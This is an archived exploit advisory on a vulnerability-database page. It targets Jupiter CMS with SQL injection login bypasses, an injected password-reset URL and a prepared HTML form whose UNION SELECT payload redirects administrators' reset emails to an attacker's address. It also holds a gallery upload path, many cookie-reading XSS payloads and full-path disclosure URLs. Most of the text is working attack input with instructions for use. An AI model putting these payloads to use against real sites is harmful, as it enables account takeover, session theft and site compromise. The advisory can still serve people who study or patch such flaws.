Vulners
Lucene search
jupiterCMS-sql.txt
`Hello,,
Jupiter CMS Sql injections ,full path and xss vulnerabilities
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]
if magic_quotes_gpc = off
login with
user name :
' or id=1/*
or
' or authorization = 4/*
you will be loged in with full permission
-------------------------
index.php?n=modules/register&a=3&d=3&key='%20or%20id=1/*
You will be able to change the password for any user .. know his id and put it in the url.
--
or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators
<form method="post" action="http://localhost/jupiter/index.php?n=modules/register">
<table class="main" cellspacing="1" cellpadding="4" width="100%">
<tr class="head">
<td colspan="2" class="head">Forgot your password?</td>
</tr>
<tr>
<td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td>
<td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'[email protected]',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td>
</tr>
<tr>
<td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td>
<td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td>
</tr>
<input type="hidden" name="a" value="3">
<input type="hidden" name="d" value="1">
</table>
</form>
put the user name value
Change [email protected] to your email
' union select id,authorization ,username ,password ,'[email protected]',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*
/********************************************/
Upload any picture to their gallery
modules/galleryuploadfunction.php
picture path will be
gallery/albums/public/name.ext
/********************************************/
xss (Cross site scripting)
modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(document.cookie);</script>
modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&language[Register%20title]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&language[Register%20title2]=<script>alert(document.cookie);</script>
modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script>
modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script>
modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script>
change the value for language[Mass-Email%20form%20desc(2-4)]
modules/register.php?is_guest=1&a=3&language[Forgotten%20title]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]=<script>alert(document.cookie);</script>
change the var value for language[Forgotten%20desc(2 - 5)]
modules/search.php?language[Search%20view%20desc]=<script>alert(document.cookie);</script>
modules/search.php?language[Search%20view%20desc2]=<script>alert(document.cookie);</script>
Change the value for language[Search%20view%20desc(2-8)]
/********************************************/
Full path
includes/functions.php
modules/register.php?is_guest=1
modules/online.php
modules/poll.php
modules/panel.php
modules/pm.php
modules/news.php
modules/templates_change.php
modules/users.php
modules/misc.php?a=1&is_webmaster=1
modules/masspm.php
modules/mass-email.php?subject_choice=1&message_choice=1&a=1
modules/main-nav.php
modules/login.php
modules/layout.php?is_webmaster=2
modules/hq.php
modules/forum.php
modules/forum-admin.php?n=modules/forum-admin&a=1
modules/events.php
modules/emoticons.php
modules/download.php
modules/blocks.php?is_webmaster=2
modules/ban.php
modules/badwords.php
modules/ads.php
modules/admin.php
/********************************************/
WwW.SoQoR.NeT
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Sep 2006 00:00Current
7.4High risk
Vulners AI Score7.4